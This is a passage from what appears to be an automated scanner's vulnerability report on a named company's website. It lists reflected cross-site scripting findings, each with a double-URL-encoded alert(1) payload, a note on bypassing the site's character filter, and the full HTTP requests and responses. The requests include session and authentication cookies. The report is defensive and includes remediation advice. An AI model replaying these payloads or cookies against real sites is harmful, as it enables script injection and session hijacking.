                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/22e29";alert(1)//859e850a46d","E404") ;
   </script>
...[SNIP]...

1.70. http://www.sigmaaldrich.com/configurator/servlet/DesignCenter [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /configurator/servlet/DesignCenter

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f was submitted in the REST URL parameter 1. This input was echoed as 5d06d";alert(1)//7602bb0231f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /5d06d%2522%253balert%25281%2529%252f%252f7602bb0231f/servlet/DesignCenter HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930595442&t2=1289930595676&t3=1289930598297&t4=1289930595270&lti=1289930598297&ln=&hr=/configurator/servlet/DesignCenter&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/customer-service/services.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930595286}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:06 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/5d06d";alert(1)//7602bb0231f/servlet/DesignCenter","E404") ;
   </script>
...[SNIP]...

1.71. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b was submitted in the REST URL parameter 1. This input was echoed as dfd1d";alert(1)//58a78da8a9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentdfd1d%2522%253balert%25281%2529%252f%252f58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:50 GMT
Content-Length: 28967
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentdfd1d";alert(1)//58a78da8a9b/safc-biosciences/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.72. http://www.sigmaaldrich.com/content/safc-biosciences/en-us/home/services/scale-up-solutions [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-biosciences/en-us/home/services/scale-up-solutions

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db3d7%2522%253balert%25281%2529%252f%252f49e75eec73 was submitted in the REST URL parameter 2. This input was echoed as db3d7";alert(1)//49e75eec73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/db3d7%2522%253balert%25281%2529%252f%252f49e75eec73/en-us/home/services/scale-up-solutions HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/db3d7";alert(1)//49e75eec73/en-us/home/services/scale-up-solutions","E404") ;
   </script>
...[SNIP]...

1.73. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af575%2522%253balert%25281%2529%252f%252fd3f26007b52 was submitted in the REST URL parameter 1. This input was echoed as af575";alert(1)//d3f26007b52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentaf575%2522%253balert%25281%2529%252f%252fd3f26007b52/safc-pharma/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:49 GMT
Content-Length: 28959
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/contentaf575";alert(1)//d3f26007b52/safc-pharma/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.74. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/large-molecule-biologics [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/large-molecule-biologics

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e was submitted in the REST URL parameter 2. This input was echoed as 8d7dd";alert(1)//bcdc9532a6e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/8d7dd%2522%253balert%25281%2529%252f%252fbcdc9532a6e/en-us/home/large-molecule-biologics HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:53 GMT
Content-Length: 28948
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/8d7dd";alert(1)//bcdc9532a6e/en-us/home/large-molecule-biologics","E404") ;
   </script>
...[SNIP]...

1.75. http://www.sigmaaldrich.com/content/safc-pharma/en-us/home/small-molecule-api/services-overview [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/safc-pharma/en-us/home/small-molecule-api/services-overview

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68a09%2522%253balert%25281%2529%252f%252f19b43806d4c was submitted in the REST URL parameter 1. This input was echoed as 68a09";alert(1)//19b43806d4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content68a09%2522%253balert%25281%2529%252f%252f19b43806d4c/safc-pharma/en-us/home/small-molecule-api/services-overview HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
